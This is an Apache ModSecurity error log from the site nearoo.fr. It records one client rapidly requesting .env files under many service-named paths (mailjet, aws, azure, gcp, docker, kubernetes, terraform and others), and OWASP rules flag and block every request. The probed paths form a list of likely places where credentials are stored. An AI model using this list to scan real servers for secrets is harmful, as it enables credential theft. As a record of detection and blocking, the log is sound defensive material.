[Mon May 11 16:54:45.585665 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailjet/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mailjet/.env"] [unique_id "agHttUWKUxpmnkK7zHyHZQAAAQI"]
[Mon May 11 16:54:45.585873 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mailjet/.env"] [unique_id "agHttUWKUxpmnkK7zHyHZQAAAQI"]
[Mon May 11 16:54:45.586096 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mailjet/.env"] [unique_id "agHttUWKUxpmnkK7zHyHZQAAAQI"]
[Mon May 11 16:54:46.055527 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /brevo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/brevo/.env"] [unique_id "agHttkWKUxpmnkK7zHyHZwAAAQI"]
[Mon May 11 16:54:46.055683 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/brevo/.env"] [unique_id "agHttkWKUxpmnkK7zHyHZwAAAQI"]
[Mon May 11 16:54:46.055895 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/brevo/.env"] [unique_id "agHttkWKUxpmnkK7zHyHZwAAAQI"]
[Mon May 11 16:54:46.327625 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /transactional/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/transactional/.env"] [unique_id "agHttkWKUxpmnkK7zHyHaAAAAQI"]
[Mon May 11 16:54:46.327819 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/transactional/.env"] [unique_id "agHttkWKUxpmnkK7zHyHaAAAAQI"]
[Mon May 11 16:54:46.328041 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/transactional/.env"] [unique_id "agHttkWKUxpmnkK7zHyHaAAAAQI"]
[Mon May 11 16:54:46.567334 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bulk/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/bulk/.env"] [unique_id "agHttkWKUxpmnkK7zHyHaQAAAQI"]
[Mon May 11 16:54:46.567567 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/bulk/.env"] [unique_id "agHttkWKUxpmnkK7zHyHaQAAAQI"]
[Mon May 11 16:54:46.567805 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/bulk/.env"] [unique_id "agHttkWKUxpmnkK7zHyHaQAAAQI"]
[Mon May 11 16:54:46.735533 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /aws/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/aws/.env"] [unique_id "agHttkWKUxpmnkK7zHyHagAAAQI"]
[Mon May 11 16:54:46.735743 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/aws/.env"] [unique_id "agHttkWKUxpmnkK7zHyHagAAAQI"]
[Mon May 11 16:54:46.735959 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/aws/.env"] [unique_id "agHttkWKUxpmnkK7zHyHagAAAQI"]
[Mon May 11 16:54:46.912910 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/azure/.env"] [unique_id "agHttkWKUxpmnkK7zHyHawAAAQI"]
[Mon May 11 16:54:46.913075 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/azure/.env"] [unique_id "agHttkWKUxpmnkK7zHyHawAAAQI"]
[Mon May 11 16:54:46.913295 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/azure/.env"] [unique_id "agHttkWKUxpmnkK7zHyHawAAAQI"]
[Mon May 11 16:54:47.085654 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/gcp/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHbAAAAQI"]
[Mon May 11 16:54:47.085879 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/gcp/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHbAAAAQI"]
[Mon May 11 16:54:47.086100 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/gcp/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHbAAAAQI"]
[Mon May 11 16:54:47.309606 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cloud/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHbQAAAQI"]
[Mon May 11 16:54:47.309822 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cloud/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHbQAAAQI"]
[Mon May 11 16:54:47.310044 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cloud/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHbQAAAQI"]
[Mon May 11 16:54:47.487754 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /infrastructure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/infrastructure/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHbgAAAQI"]
[Mon May 11 16:54:47.487954 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/infrastructure/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHbgAAAQI"]
[Mon May 11 16:54:47.488185 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/infrastructure/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHbgAAAQI"]
[Mon May 11 16:54:47.740002 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/docker/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHcAAAAQI"]
[Mon May 11 16:54:47.740243 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/docker/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHcAAAAQI"]
[Mon May 11 16:54:47.740493 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/docker/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHcAAAAQI"]
[Mon May 11 16:54:47.902723 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/k8s/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHcQAAAQI"]
[Mon May 11 16:54:47.902935 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/k8s/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHcQAAAQI"]
[Mon May 11 16:54:47.903151 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/k8s/.env"] [unique_id "agHtt0WKUxpmnkK7zHyHcQAAAQI"]
[Mon May 11 16:54:48.062477 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/kubernetes/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHcgAAAQI"]
[Mon May 11 16:54:48.062709 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/kubernetes/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHcgAAAQI"]
[Mon May 11 16:54:48.062937 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/kubernetes/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHcgAAAQI"]
[Mon May 11 16:54:48.251990 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/terraform/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHcwAAAQI"]
[Mon May 11 16:54:48.252260 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/terraform/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHcwAAAQI"]
[Mon May 11 16:54:48.252513 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/terraform/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHcwAAAQI"]
[Mon May 11 16:54:48.401006 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ansible/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/ansible/.env"] [unique_id "agHtuEWKUxpmnkK7zHyHdAAAAQI"]
